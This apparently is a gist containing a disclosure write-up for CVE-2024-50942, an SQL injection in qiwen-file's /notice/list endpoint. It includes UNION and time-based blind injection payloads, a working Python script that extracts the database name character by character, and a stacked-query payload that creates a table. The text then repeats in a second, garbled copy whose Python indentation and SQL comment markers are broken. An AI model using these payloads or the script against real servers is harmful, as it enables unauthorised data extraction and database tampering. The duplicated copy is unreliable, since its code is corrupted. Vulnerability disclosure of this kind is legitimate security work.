3xsh0re/gist:4253401806bc35b2f95dcea12a4310fc Secret

## gistfile1.txt
CVE-2024-50942

> [Vulnerability Type]
> SQL Injection
> ------------------------------------------
> [Vendor of Product]
> https://www.qiwenshare.com/
> ------------------------------------------
> [Affected Product Code Base]
> qiwen-file - <= v1.4.0
> ------------------------------------------
> [Affected Component]
> src/main/resources/mapper/NoticeMapper.xml
> ------------------------------------------
> [Attack Type]
> Remote
> ------------------------------------------
> [Impact Information Disclosure]
> true
> ------------------------------------------
> [Attack Vectors]
> /notice/list?title=')/**/AS/**/total/**/UNION /**/(SELECT/**/5211/**/FROM/**/(SELECT/**/IF(SUBSTRING(DATABASE(),1,1)='f',SLEEP(5),0))/**/AS/**/delay);
> ------------------------------------------
> [Attack Analysis]

Controller Layer
Endpoint: /notice/list
HTTP Method: GET
Parameters: Only the title parameter is required for queries.

Service Layer
Method: selectUserPage
Implementation: Simple and lacks filtering; directly uses the Data Transfer Object (DTO) as query parameters, relying on MyBatis for automatic field mapping.

SQL Injection Testing Process
Step 1: Debugging Output
Enable debugging output in the configuration file:

properties
Copy code
mybatis-plus.configuration.log-impl=org.apache.ibatis.logging.stdout.StdOutImpl
Step 2: Manual Injection Testing
Instead of using automated tools like sqlmap (which failed in this case), manual testing was conducted for SQL injection.

Initial Payloads:

Payload: '--
Result: No errors reported.
Payload: 'union/**/select/**/database()--
Result: An error was reported. On inspecting the SQL execution logs, the error was caused by a missing closing ) due to pagination in the query.
Adjusting the payload:

Corrected Payload: ')as/**/total/**/union/**/select/**/database()--
This resulted in the following complete SQL statement:

sql
Copy code
SELECT COUNT(*) FROM (SELECT * FROM notice WHERE platform = 3 AND title LIKE '%')as/**/total/**/union/**/select/**/database()-- %' ORDER BY createTime DESC) TOTAL
Outcome:
The SQL script executed successfully in a standalone SQL environment. However, on the server, the injection caused errors due to hardcoded newline characters, preventing proper execution. Since a ; was needed to terminate the query properly, blind injection was explored.

Blind SQL Injection
To test whether SQL statements can be executed, time-based blind SQL injection was used.

Script for Extracting Database Name Using Time-Based Blind Injection:
python
Copy code
import requests
import time

url = "http://x.x.x.x:32145/notice/list?title="

headers = {
    'User-Agent': 'Mozilla/5.0'
}
characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_'

def inject_payload(position, char):
    payload = f"')/**/AS/**/total/**/UNION/**/(SELECT/**/5211/**/FROM/**/(SELECT/**/IF(SUBSTRING(DATABASE(),{position},1)='{char}',SLEEP(5),0))/**/AS/**/delay);"

    params = {'title': payload}

    start_time = time.time()
    response = requests.get(url, params=params, headers=headers)
    elapsed_time = time.time() - start_time

    # Check if the server response was delayed
    if elapsed_time > 5:
        return True
    return False

def get_database_name():
    database_name = ""
    for position in range(1, 50):
        for char in characters:
            if inject_payload(position, char):
                database_name += char
                print(f"Found character '{char}' at position {position}")
                break
        else:
            break
    return database_name

# Start the blind injection attack
database_name = get_database_name()
print(f"The database name is: {database_name}")
Result:
Since the query could be terminated with ;, stacked queries were attempted. Due to the lack of output, operations like CREATE and DROP were tested.

Example Payload for Creating a Table:
sql
Copy code
')as/**/total/**/union/**/select/**/database();create/**/table/**/test(birthdate/**/DATE);--%20
Outcome:
The server returned a 500 error, but the SQL operation (creating a test table) was successfully executed.
	CVE-2024-50942

	> [Vulnerability Type]
	> SQL Injection
	> ------------------------------------------
	> [Vendor of Product]
	> https://www.qiwenshare.com/
	> ------------------------------------------
	> [Affected Product Code Base]
	> qiwen-file - <= v1.4.0
	> ------------------------------------------
	> [Affected Component]
	> src/main/resources/mapper/NoticeMapper.xml
	> ------------------------------------------
	> [Attack Type]
	> Remote
	> ------------------------------------------
	> [Impact Information Disclosure]
	> true
	> ------------------------------------------
	> [Attack Vectors]
	> /notice/list?title=')//AS//total//UNION //(SELECT//5211//FROM//(SELECT//IF(SUBSTRING(DATABASE(),1,1)='f',SLEEP(5),0))//AS//delay);
	> ------------------------------------------
	> [Attack Analysis]

	Controller Layer
	Endpoint: /notice/list
	HTTP Method: GET
	Parameters: Only the title parameter is required for queries.

	Service Layer
	Method: selectUserPage
	Implementation: Simple and lacks filtering; directly uses the Data Transfer Object (DTO) as query parameters, relying on MyBatis for automatic field mapping.

	SQL Injection Testing Process
	Step 1: Debugging Output
	Enable debugging output in the configuration file:

	properties
	Copy code
	mybatis-plus.configuration.log-impl=org.apache.ibatis.logging.stdout.StdOutImpl
	Step 2: Manual Injection Testing
	Instead of using automated tools like sqlmap (which failed in this case), manual testing was conducted for SQL injection.

	Initial Payloads:

	Payload: '--
	Result: No errors reported.
	Payload: 'union//select//database()--
	Result: An error was reported. On inspecting the SQL execution logs, the error was caused by a missing closing ) due to pagination in the query.
	Adjusting the payload:

	Corrected Payload: ')as//total//union//select//database()--
	This resulted in the following complete SQL statement:

	sql
	Copy code
	SELECT COUNT() FROM (SELECT FROM notice WHERE platform = 3 AND title LIKE '%')as//total//union//select//database()-- %' ORDER BY createTime DESC) TOTAL
	Outcome:
	The SQL script executed successfully in a standalone SQL environment. However, on the server, the injection caused errors due to hardcoded newline characters, preventing proper execution. Since a ; was needed to terminate the query properly, blind injection was explored.

	Blind SQL Injection
	To test whether SQL statements can be executed, time-based blind SQL injection was used.

	Script for Extracting Database Name Using Time-Based Blind Injection:
	python
	Copy code
	import requests
	import time

	url = "http://x.x.x.x:32145/notice/list?title="

	headers = {
	'User-Agent': 'Mozilla/5.0'
	}
	characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_'

	def inject_payload(position, char):
	payload = f"')//AS//total//UNION//(SELECT//5211//FROM//(SELECT//IF(SUBSTRING(DATABASE(),{position},1)='{char}',SLEEP(5),0))//AS//delay);"

	params = {'title': payload}

	start_time = time.time()
	response = requests.get(url, params=params, headers=headers)
	elapsed_time = time.time() - start_time

	# Check if the server response was delayed
	if elapsed_time > 5:
	return True
	return False

	def get_database_name():
	database_name = ""
	for position in range(1, 50):
	for char in characters:
	if inject_payload(position, char):
	database_name += char
	print(f"Found character '{char}' at position {position}")
	break
	else:
	break
	return database_name

	# Start the blind injection attack
	database_name = get_database_name()
	print(f"The database name is: {database_name}")
	Result:
	Since the query could be terminated with ;, stacked queries were attempted. Due to the lack of output, operations like CREATE and DROP were tested.

	Example Payload for Creating a Table:
	sql
	Copy code
	')as//total//union//select//database();create//table//test(birthdate/**/DATE);--%20
	Outcome:
	The server returned a 500 error, but the SQL operation (creating a test table) was successfully executed.